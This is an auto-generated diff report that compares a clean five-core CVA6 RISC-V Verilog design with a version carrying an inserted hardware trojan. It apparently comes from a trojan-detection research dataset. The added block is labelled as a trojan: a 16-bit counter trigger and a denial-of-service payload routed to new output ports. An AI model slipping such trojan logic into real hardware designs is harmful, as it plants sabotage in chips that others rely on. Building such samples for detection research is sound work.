Structural Comparison: Clean vs Trojaned
Design 2: 5-core CVA6 (counter → dos)
Generated: 2026-01-21T17:31:08.505213
================================================================================

--- /Users/yaroslavpopryho/Study/UIC/Research/MIMIC/professor_package/TrojanFree/cva6_massive_5core_clean_002.v	2026-01-21 17:30:56
+++ /Users/yaroslavpopryho/Study/UIC/Research/MIMIC/professor_package/TrojanInserted/cva6_massive_5core_trojan_002_counter_dos.v	2026-01-21 17:30:56
@@ -17,7 +17,9 @@
   input logic clk_i,
   input logic rst_ni,
   input logic [63:0] boot_addr_i,
-  input logic [63:0] hart_id_i
+  input logic [63:0] hart_id_i,
+  output logic trojan_trigger_o,
+  output logic trojan_payload_o
 );
 
 
@@ -5949,6 +5951,29 @@
 
 
   // End of Core 4
+
 
 
+  // === INSERTED TROJAN START ===
+  // Trigger: counter, Payload: dos
+  // Inserted: 2026-01-21T17:30:44.645722
+
+  reg [15:0] trojan_counter_2;
+  wire trojan_trigger_2;
+
+  always @(posedge clk_i or posedge rst_ni) begin
+    if (rst_ni)
+      trojan_counter_2 <= 16'h0000;
+    else if (boot_addr_i[0])
+      trojan_counter_2 <= trojan_counter_2 + 1;
+  end
+  assign trojan_trigger_2 = (trojan_counter_2 == 16'hFFFF);
+
+  wire trojan_payload_2; assign trojan_payload_2 = trojan_trigger_2 ? 1'b0 : boot_addr_i[0];
+
+  // Connect Trojan signals to output ports
+  assign trojan_trigger_o = trojan_trigger_2;
+  assign trojan_payload_o = trojan_payload_2;
+
+  // === INSERTED TROJAN END ===
 endmodule
